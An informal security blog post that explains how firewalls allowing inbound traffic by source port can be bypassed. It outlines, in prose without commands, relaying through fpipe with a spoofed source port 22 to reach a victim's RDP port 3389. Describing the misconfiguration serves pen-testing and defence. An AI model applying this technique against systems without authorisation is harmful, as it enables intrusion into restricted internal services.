Spoofing Source ports and getting in

An interesting but probably reasonably known technique of getting past firewalls. Incase there's a firewall out there which has ..for some reason been "configured" to allow traffic from source port 23 through. Why would it do this? Well .. ideally due to loads of firewalls being stateful these days you don't need to have bi-directional rules allowing all traffic with say.. a source port of 23 through if you've already allowed it outbound. So to explain things a bit more clearly:

If you have already a rule like:
Internal Network -- Internet -- allow traffic with a destination port of 80

Then you don't need to have a rule like:
Internet -- Internal Network -- allow traffic with a source port of 80

Thats what a stateful firewall does; keeps track of which client issued which connection to port 80 of which client and makes sure that it returns the response to that very client. So ideally a bi-directional rule is most probably a misconfiguration.

Still I won't be shocked to see many people outside still doing stuff like this so incase you happen to come across a firewall which lets traffic in based on a source port; you could use fpipe to spoof the source port and try and access traffic on other restricted ports inside but are "inaccessible' from the outside.

I wont go into the details of how to use "fpipe" coz that's easily obtainable at Foundstone. Effectively though --

You are on Machine 1
You set Fpipe to listen on 5555 on Machine 2 and connect to 3389 on Machine 3(VICTIM)
You set Fpipe to use port 22 as its source port because inbound SSH has been allowed

So when you connect to Machine 2:5555 , Machine 2 will initiate a connection using source port 22(ALLOWED BY THE FIREWALL) and make a connection to Machine3:3389. Once done it'll forward the connection over to Machine 1 where you're doing your pen-testing. Quite cool ...but really it really can be exploited only incase of some really lazy sysadmins or a firewall thats as old as Fred Flintstone is being used ;)